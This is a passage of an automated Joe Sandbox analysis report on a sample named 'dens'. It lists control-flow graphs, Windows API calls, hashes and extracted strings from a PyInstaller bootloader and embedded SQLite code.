                                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                              • Opcode ID: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                              • Instruction ID: b5a338b783929cad4779f87220ea5676c707933e2c38f8c04746b14b5e70b0a5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab383ac4b995131bdd40696453c0f16ebeee9cffe796343d9728e2385cbc1d23
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4510322A0C64289EE21AB15EC413BA6291FF857B4F444131EE4EC77C5EF3DE981C706

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36E1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36EB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction ID: 4e8cdb5d84c73ba29dae0b0be3486a0f330b31544a968323086ec233db2db0ea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921A761F1CA4285FE309724EC163BA2250BF98374F404132EE5DC25E5EF6DE645C74A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1461 7ffdfabf44f0-7ffdfabf45b4 call 7ffdfabf41f0 1464 7ffdfabf45ba-7ffdfabf45d8 1461->1464 1465 7ffdfabf4966-7ffdfabf4969 1461->1465 1466 7ffdfabf45da-7ffdfabf45ed 1464->1466 1467 7ffdfabf45f2-7ffdfabf45f6 1464->1467 1468 7ffdfabf496b-7ffdfabf4971 1465->1468 1469 7ffdfabf4973-7ffdfabf4976 call 7ffdfab76c20 1465->1469 1470 7ffdfabf498f-7ffdfabf49ae call 7ffdfaca2bc0 1466->1470 1471 7ffdfabf45f8-7ffdfabf45ff 1467->1471 1472 7ffdfabf4606-7ffdfabf4612 1467->1472 1468->1469 1473 7ffdfabf497b-7ffdfabf4981 call 7ffdfabd1350 1468->1473 1469->1473 1471->1472 1475 7ffdfabf4601 call 7ffdfab8fe80 1471->1475 1476 7ffdfabf4614-7ffdfabf4618 1472->1476 1477 7ffdfabf461e-7ffdfabf4622 1472->1477 1485 7ffdfabf4986-7ffdfabf4988 1473->1485 1475->1472 1476->1477 1482 7ffdfabf469b-7ffdfabf46a6 1476->1482 1483 7ffdfabf462a-7ffdfabf462f call 7ffdfab93750 1477->1483 1484 7ffdfabf4624-7ffdfabf4628 1477->1484 1488 7ffdfabf46b0-7ffdfabf46c7 call 7ffdfab9d640 1482->1488 1489 7ffdfabf4634-7ffdfabf4638 1483->1489 1484->1483 1486 7ffdfabf4698 1484->1486 1485->1470 1486->1482 1493 7ffdfabf46c9-7ffdfabf46d1 1488->1493 1489->1486 1491 7ffdfabf463a-7ffdfabf4647 call 7ffdfac329e0 1489->1491 1498 7ffdfabf4649 1491->1498 1499 7ffdfabf467e-7ffdfabf4685 1491->1499 1496 7ffdfabf46d3-7ffdfabf46dc 1493->1496 1497 7ffdfabf46de 1493->1497 1500 7ffdfabf46e1-7ffdfabf46ef 1496->1500 1497->1500 1501 7ffdfabf4650-7ffdfabf4659 1498->1501 1504 7ffdfabf4687-7ffdfabf468a call 7ffdfab763e0 1499->1504 1505 7ffdfabf468f-7ffdfabf4693 1499->1505 1502 7ffdfabf47a5 1500->1502 1503 7ffdfabf46f5-7ffdfabf46f8 1500->1503 1501->1501 1506 7ffdfabf465b-7ffdfabf466d call 7ffdfab76860 1501->1506 1509 7ffdfabf47aa-7ffdfabf47bd 1502->1509 1507 7ffdfabf46fa-7ffdfabf46ff 1503->1507 1508 7ffdfabf4735-7ffdfabf473b 1503->1508 1504->1505 1511 7ffdfabf4949-7ffdfabf4951 1505->1511 1506->1499 1532 7ffdfabf466f-7ffdfabf4679 memcpy 1506->1532 1507->1508 1515 7ffdfabf4701-7ffdfabf4716 1507->1515 1508->1502 1518 7ffdfabf473d-7ffdfabf4750 call 7ffdfab76860 1508->1518 1516 7ffdfabf47f3-7ffdfabf4806 1509->1516 1517 7ffdfabf47bf-7ffdfabf47c4 1509->1517 1512 7ffdfabf4953-7ffdfabf4957 1511->1512 1513 7ffdfabf495e-7ffdfabf4964 1511->1513 1512->1513 1521 7ffdfabf4959 call 7ffdfab8fe50 1512->1521 1513->1465 1513->1485 1523 7ffdfabf472b-7ffdfabf4733 call 7ffdfabda8e0 1515->1523 1524 7ffdfabf4718-7ffdfabf471b 1515->1524 1519 7ffdfabf480c-7ffdfabf4814 1516->1519 1520 7ffdfabf4808 1516->1520 1525 7ffdfabf47d6-7ffdfabf47dd 1517->1525 1526 7ffdfabf47c6-7ffdfabf47cb 1517->1526 1538 7ffdfabf4786-7ffdfabf478d 1518->1538 1539 7ffdfabf4752-7ffdfabf4783 1518->1539 1529 7ffdfabf485c-7ffdfabf485e 1519->1529 1530 7ffdfabf4816-7ffdfabf4829 call 7ffdfab76860 1519->1530 1520->1519 1521->1513 1523->1509 1524->1523 1533 7ffdfabf471d-7ffdfabf471f 1524->1533 1537 7ffdfabf47e0-7ffdfabf47ee call 7ffdfab92e10 1525->1537 1534 7ffdfabf47d4 1526->1534 1535 7ffdfabf47cd-7ffdfabf47d2 1526->1535 1542 7ffdfabf486b-7ffdfabf48c2 call 7ffdfab79160 call 7ffdfabed030 1529->1542 1543 7ffdfabf4860-7ffdfabf4864 1529->1543 1554 7ffdfabf482b-7ffdfabf483d 1530->1554 1555 7ffdfabf4842-7ffdfabf4849 1530->1555 1532->1499 1533->1523 1541 7ffdfabf4721-7ffdfabf4726 1533->1541 1534->1525 1535->1537 1537->1516 1546 7ffdfabf4797-7ffdfabf47a0 1538->1546 1547 7ffdfabf478f-7ffdfabf4792 call 7ffdfab763e0 1538->1547 1539->1538 1549 7ffdfabf493a-7ffdfabf493e 1541->1549 1561 7ffdfabf48c7-7ffdfabf48d9 1542->1561 1543->1542 1550 7ffdfabf4866 1543->1550 1546->1549 1547->1546 1549->1511 1552 7ffdfabf4940-7ffdfabf4944 call 7ffdfab94b40 1549->1552 1550->1542 1552->1511 1554->1555 1559 7ffdfabf484b-7ffdfabf484e call 7ffdfab763e0 1555->1559 1560 7ffdfabf4853-7ffdfabf4857 1555->1560 1559->1560 1560->1549 1563 7ffdfabf48db-7ffdfabf48e1 call 7ffdfab763e0 1561->1563 1564 7ffdfabf48e6-7ffdfabf48e8 1561->1564 1563->1564 1566 7ffdfabf48ea-7ffdfabf48f0 call 7ffdfabce560 1564->1566 1567 7ffdfabf48f5-7ffdfabf48f9 1564->1567 1566->1567 1569 7ffdfabf48fb-7ffdfabf4910 call 7ffdfabd13e0 1567->1569 1570 7ffdfabf4912-7ffdfabf4914 1567->1570 1569->1549 1572 7ffdfabf4925-7ffdfabf4935 1570->1572 1573 7ffdfabf4916-7ffdfabf491e 1570->1573 1572->1549 1573->1549 1575 7ffdfabf4920-7ffdfabf4923 1573->1575 1575->1549 1575->1572
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                              • API String ID: 3510742995-879093740
                                                                                                                                                                                                                                              • Opcode ID: ba2d0f86b6dcf29befeee4b93b35b993a661bf8d68e9ff4e596beaf804d09bdb
                                                                                                                                                                                                                                              • Instruction ID: 9c7208093128e9963853f738c9e9a0edf11b1cb28f046bdc85dd15533bbe32d8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba2d0f86b6dcf29befeee4b93b35b993a661bf8d68e9ff4e596beaf804d09bdb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FE1F522F087918AFB18CBA5C560ABC27A5FB45788F4981B5CE2C177D9DF38E452C340

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1576 7ff62c10ba5c-7ff62c10ba82 1577 7ff62c10ba9d-7ff62c10baa1 1576->1577 1578 7ff62c10ba84-7ff62c10ba98 call 7ff62c104ee8 call 7ff62c104f08 1576->1578 1580 7ff62c10be77-7ff62c10be83 call 7ff62c104ee8 call 7ff62c104f08 1577->1580 1581 7ff62c10baa7-7ff62c10baae 1577->1581 1596 7ff62c10be8e 1578->1596 1598 7ff62c10be89 call 7ff62c10a8e0 1580->1598 1581->1580 1583 7ff62c10bab4-7ff62c10bae2 1581->1583 1583->1580 1587 7ff62c10bae8-7ff62c10baef 1583->1587 1588 7ff62c10bb08-7ff62c10bb0b 1587->1588 1589 7ff62c10baf1-7ff62c10bb03 call 7ff62c104ee8 call 7ff62c104f08 1587->1589 1594 7ff62c10bb11-7ff62c10bb17 1588->1594 1595 7ff62c10be73-7ff62c10be75 1588->1595 1589->1598 1594->1595 1600 7ff62c10bb1d-7ff62c10bb20 1594->1600 1599 7ff62c10be91-7ff62c10bea8 1595->1599 1596->1599 1598->1596 1600->1589 1603 7ff62c10bb22-7ff62c10bb47 1600->1603 1605 7ff62c10bb49-7ff62c10bb4b 1603->1605 1606 7ff62c10bb7a-7ff62c10bb81 1603->1606 1609 7ff62c10bb4d-7ff62c10bb54 1605->1609 1610 7ff62c10bb72-7ff62c10bb78 1605->1610 1607 7ff62c10bb56-7ff62c10bb6d call 7ff62c104ee8 call 7ff62c104f08 call 7ff62c10a8e0 1606->1607 1608 7ff62c10bb83-7ff62c10bbab call 7ff62c10d5fc call 7ff62c10a948 * 2 1606->1608 1637 7ff62c10bd00 1607->1637 1639 7ff62c10bbc8-7ff62c10bbf3 call 7ff62c10c284 1608->1639 1640 7ff62c10bbad-7ff62c10bbc3 call 7ff62c104f08 call 7ff62c104ee8 1608->1640 1609->1607 1609->1610 1611 7ff62c10bbf8-7ff62c10bc0f 1610->1611 1614 7ff62c10bc8a-7ff62c10bc94 call 7ff62c11391c 1611->1614 1615 7ff62c10bc11-7ff62c10bc19 1611->1615 1626 7ff62c10bc9a-7ff62c10bcaf 1614->1626 1627 7ff62c10bd1e 1614->1627 1615->1614 1618 7ff62c10bc1b-7ff62c10bc1d 1615->1618 1618->1614 1622 7ff62c10bc1f-7ff62c10bc35 1618->1622 1622->1614 1629 7ff62c10bc37-7ff62c10bc43 1622->1629 1626->1627 1631 7ff62c10bcb1-7ff62c10bcc3 GetConsoleMode 1626->1631 1635 7ff62c10bd23-7ff62c10bd43 ReadFile 1627->1635 1629->1614 1633 7ff62c10bc45-7ff62c10bc47 1629->1633 1631->1627 1636 7ff62c10bcc5-7ff62c10bccd 1631->1636 1633->1614 1638 7ff62c10bc49-7ff62c10bc61 1633->1638 1641 7ff62c10bd49-7ff62c10bd51 1635->1641 1642 7ff62c10be3d-7ff62c10be46 GetLastError 1635->1642 1636->1635 1644 7ff62c10bccf-7ff62c10bcf1 ReadConsoleW 1636->1644 1647 7ff62c10bd03-7ff62c10bd0d call 7ff62c10a948 1637->1647 1638->1614 1648 7ff62c10bc63-7ff62c10bc6f 1638->1648 1639->1611 1640->1637 1641->1642 1650 7ff62c10bd57 1641->1650 1645 7ff62c10be48-7ff62c10be5e call 7ff62c104f08 call 7ff62c104ee8 1642->1645 1646 7ff62c10be63-7ff62c10be66 1642->1646 1653 7ff62c10bd12-7ff62c10bd1c 1644->1653 1654 7ff62c10bcf3 GetLastError 1644->1654 1645->1637 1658 7ff62c10bcf9-7ff62c10bcfb call 7ff62c104e7c 1646->1658 1659 7ff62c10be6c-7ff62c10be6e 1646->1659 1647->1599 1648->1614 1657 7ff62c10bc71-7ff62c10bc73 1648->1657 1651 7ff62c10bd5e-7ff62c10bd73 1650->1651 1651->1647 1661 7ff62c10bd75-7ff62c10bd80 1651->1661 1653->1651 1654->1658 1657->1614 1665 7ff62c10bc75-7ff62c10bc85 1657->1665 1658->1637 1659->1647 1667 7ff62c10bda7-7ff62c10bdaf 1661->1667 1668 7ff62c10bd82-7ff62c10bd9b call 7ff62c10b674 1661->1668 1665->1614 1672 7ff62c10be2b-7ff62c10be38 call 7ff62c10b4b4 1667->1672 1673 7ff62c10bdb1-7ff62c10bdc3 1667->1673 1676 7ff62c10bda0-7ff62c10bda2 1668->1676 1672->1676 1677 7ff62c10be1e-7ff62c10be26 1673->1677 1678 7ff62c10bdc5 1673->1678 1676->1647 1677->1647 1680 7ff62c10bdca-7ff62c10bdd1 1678->1680 1681 7ff62c10be0d-7ff62c10be18 1680->1681 1682 7ff62c10bdd3-7ff62c10bdd7 1680->1682 1681->1677 1683 7ff62c10bdd9-7ff62c10bde0 1682->1683 1684 7ff62c10bdf3 1682->1684 1683->1684 1685 7ff62c10bde2-7ff62c10bde6 1683->1685 1686 7ff62c10bdf9-7ff62c10be09 1684->1686 1685->1684 1687 7ff62c10bde8-7ff62c10bdf1 1685->1687 1686->1680 1688 7ff62c10be0b 1686->1688 1687->1686 1688->1677
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                              • Instruction ID: d5de01b296e57e1315b7a636ad8fd171338d95024b338c194b25237a98fabddb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C1F322A0C68792EF609B15984A2BD7B50FB81BF4F554131EE4E83791EE7CE865C702

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1689 7ffdfab7f3a0-7ffdfab7f3cc 1690 7ffdfab7f3e1-7ffdfab7f3ea 1689->1690 1691 7ffdfab7f3ce call 7ffdfab7ebd0 1689->1691 1693 7ffdfab7f3f2-7ffdfab7f3f6 1690->1693 1694 7ffdfab7f3ec 1690->1694 1697 7ffdfab7f3d3-7ffdfab7f3d7 1691->1697 1695 7ffdfab7f40e-7ffdfab7f411 1693->1695 1696 7ffdfab7f3f8-7ffdfab7f404 call 7ffdfab7ea20 1693->1696 1694->1693 1699 7ffdfab7f644-7ffdfab7f661 1695->1699 1700 7ffdfab7f417-7ffdfab7f451 1695->1700 1705 7ffdfab7f63f-7ffdfab7f642 1696->1705 1706 7ffdfab7f40a 1696->1706 1701 7ffdfab7f691-7ffdfab7f69d 1697->1701 1702 7ffdfab7f3dd 1697->1702 1704 7ffdfab7f666-7ffdfab7f675 1699->1704 1712 7ffdfab7f453-7ffdfab7f45b 1700->1712 1713 7ffdfab7f481-7ffdfab7f483 1700->1713 1702->1690 1707 7ffdfab7f681-7ffdfab7f687 1704->1707 1708 7ffdfab7f677-7ffdfab7f67e 1704->1708 1705->1699 1705->1704 1706->1695 1710 7ffdfab7f68f 1707->1710 1711 7ffdfab7f689 1707->1711 1708->1707 1710->1701 1711->1710 1712->1713 1723 7ffdfab7f45d-7ffdfab7f47f call 7ffdfab7d7a0 1712->1723 1714 7ffdfab7f4b1-7ffdfab7f4b7 1713->1714 1715 7ffdfab7f485-7ffdfab7f4ac call 7ffdfab7d7a0 1713->1715 1716 7ffdfab7f502-7ffdfab7f518 call 7ffdfab765b0 1714->1716 1717 7ffdfab7f4b9-7ffdfab7f4c1 1714->1717 1721 7ffdfab7f62e-7ffdfab7f63a 1715->1721 1728 7ffdfab7f524-7ffdfab7f553 1716->1728 1729 7ffdfab7f51a-7ffdfab7f51f 1716->1729 1717->1721 1722 7ffdfab7f4c7-7ffdfab7f4cb call 7ffdfab7dcb0 1717->1722 1721->1705 1731 7ffdfab7f4d0-7ffdfab7f4d4 1722->1731 1723->1713 1728->1721 1733 7ffdfab7f559 1728->1733 1729->1721 1731->1716 1734 7ffdfab7f4d6-7ffdfab7f4fd call 7ffdfab7d7a0 1731->1734 1735 7ffdfab7f560-7ffdfab7f582 CreateFileMappingW 1733->1735 1734->1721 1736 7ffdfab7f584-7ffdfab7f5be MapViewOfFile 1735->1736 1737 7ffdfab7f5f3-7ffdfab7f623 call 7ffdfab7d7a0 1735->1737 1736->1737 1739 7ffdfab7f5c0-7ffdfab7f5eb 1736->1739 1737->1721 1746 7ffdfab7f625 1737->1746 1739->1735 1741 7ffdfab7f5f1 1739->1741 1741->1721 1746->1721
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateMappingViewmemset
                                                                                                                                                                                                                                              • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                                                              • API String ID: 3919632203-2257004166
                                                                                                                                                                                                                                              • Opcode ID: 51401afac1aea8d5b64e98ff47cd8b7946d99476b6cf9f3d17d3fc8ae9a2388f
                                                                                                                                                                                                                                              • Instruction ID: 745aad4d3a94ca9f6499368346cae1df0d80dc233fb09eea087ee4f3e79bb742
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51401afac1aea8d5b64e98ff47cd8b7946d99476b6cf9f3d17d3fc8ae9a2388f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4881BE76B08A4286EB288F35E420A6937A1FB88B99F854175DE6D477ECDF3CE401C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$FileReadmemset
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                              • API String ID: 2051157613-1843600136
                                                                                                                                                                                                                                              • Opcode ID: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
                                                                                                                                                                                                                                              • Instruction ID: 8c316e27bcd2b01fe16ca43b3bc12f1217e6073a2839d147c64239153111d179
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2541F336B0864282E3189F16E8649BD7761FB447C0F850276EA6D577DCDF7CE4468B40
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                              • Opcode ID: 6bfffda2f71952109638076ae884e7e5d57c5dcfa62dc35d578edba97c4b3a9f
                                                                                                                                                                                                                                              • Instruction ID: e64f00e6ef61235a7718a6f33f147781fcb48ef12a3d73405ea77d3c2d684b73
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bfffda2f71952109638076ae884e7e5d57c5dcfa62dc35d578edba97c4b3a9f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E419221A18A8695EE21EB64EC152E96311FF543A0F800132DE5CC36D5EF7DF689C746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset$CreateFile
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                              • API String ID: 333288564-3829269058
                                                                                                                                                                                                                                              • Opcode ID: 7f438b99b9e427d0e978196a2c9684824045a0de927ee2337bd3f4686d8fa872
                                                                                                                                                                                                                                              • Instruction ID: d669bf85461bf8a9a1ae0667e24b23ec9303e4428bdd7902d670ff6263db97fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f438b99b9e427d0e978196a2c9684824045a0de927ee2337bd3f4686d8fa872
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1027239B0D64286FB5C9B16A874A7D63A0FF84B94F4441B5DE7E4A6E8CF3CE4458700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFABED1A0), ref: 00007FFDFABA911D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
